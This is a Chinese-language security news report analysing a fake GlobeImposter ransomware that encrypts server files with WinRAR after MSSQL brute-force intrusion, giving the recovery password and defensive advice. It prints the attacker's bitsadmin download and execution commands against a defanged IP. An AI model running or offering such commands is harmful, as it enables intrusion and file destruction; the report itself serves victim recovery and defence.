歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

WinRAR加密壓縮冒充GlobeImposter勒索病毒 安全專家輕松解密

來源:本站整理 作者:佚名 時間:2019-07-03 TAG: 我要投稿

近日,騰訊安全御見威脅情報中心發現假冒GlobeImposter勒索病毒正在傳播,攻擊者疑通過MS SQL爆破入侵服務器,通過網絡下載惡意腳本代碼,繼而執行加密和勒索流程。
令人驚嘆的是,這個所謂的“勒索病毒”執行極為簡單,只是利用WinRAR加密壓縮用戶文件,之后再將一封GlobeImposter的勒索消息郵件修改后恐嚇用戶,通過郵箱聯系索取酬金。騰訊安全提醒大家,如遇到此病毒,不要著急著繳納贖金。該病毒加密壓縮的密碼明文寫在病毒配置信息中,使用這個密碼解壓縮,文件就能完全恢復。
分析
被勒索服務器疑似被通過MSSQL爆破入侵成功,之后執行以下相關命令行進一步下載執行惡意代碼:
1)bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar
2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar
3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd
jr26.rar為一個帶密碼的壓縮包,密碼為p.5p

jr26.rar解壓后可得到一個疑似亂碼的腳本文件

16進制查看可發現貌似多了0xFF 0xFE 0x0D 0x0A,目測應該是以二進制形式寫入的標志,導致文本類識別工具無法查看

去掉0xFF 0xFE 0x0D 0x0A后嘗試再次打開,腳本內容已可以正常查看

查看腳本內容可知,主要目的為將指定類型的文件根據后綴分類,分別使用winrar進行加密壓縮(通過上圖的命令行參數,我們看到加密密碼為lll.hc3t6b9s8kz5r26),文件將被壓縮至根目錄下對應的不同文件名(郵箱.ch_文件后綴類型.隨機數字tiger88818)包內,同時刪除原始文件。

如下[email protected]_bax.32419tiger88818包內,則被帶密碼壓縮了所有bak類型的文件

同時,為了防止加密壓縮時,數據庫文件被占用導致加密中止,病毒還會結束大量的數據庫服務相關進程。

最奇葩的來了,加密文件完成后,病毒會通過遠程下載一個勒索說明文檔

打開說明文檔,竟然是知名勒索病毒GlobeImposter的修改版本,該病毒作者只是修改了聯系郵箱。

進一步觀察病毒使用的url可發現攻擊者使用的多個文件,分別有勒索說明文檔(HOW_TO_BACK_YOUR_FILE*),勒索腳本包(jr26.rar),正規的winrar壓縮模塊(Rar.exe),猜測為掃描器相關模塊包(帶未知密碼的s.rar包),且病毒使用服務部署在某知名云平臺服務器上。


騰訊安全提醒大家,針對此病毒,可以不必著急繳納贖金,可嘗試使用Winrar打開根目錄中的*tiger88818后綴文件,然后選擇使用密碼(lll.hc3t6b9s8kz5r26)解壓到指定位置,即可恢復文件。


安全建議
企業用戶:
1、盡量關閉不必要的端口,如:445、135,139等,對3389,5900等端口可進行白名單配置,只允許白名單內的IP連接登陸;
2、盡量關閉不必要的文件共享,如有需要,請使用ACL和強密碼保護來限制訪問權限,禁用對共享文件夾的匿名訪問;
3、采用高強度的密碼,避免使用弱口令密碼,并定期更換密碼。建議服務器密碼使用高強度且無規律密碼,并且強制要求每個服務器使用不同密碼管理;
4、對沒有互聯需求的服務器/工作站內部訪問設置相應控制,避免可連外網服務器被攻擊后作為跳板進一步攻擊其他服務器;
5、對重要文件和數據(數據庫等數據)進行定期非本地備份;
6、教育終端用戶謹慎下載陌生郵件附件,若非必要,應禁止啟用Office宏代碼;

[1] [2]  下一頁

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺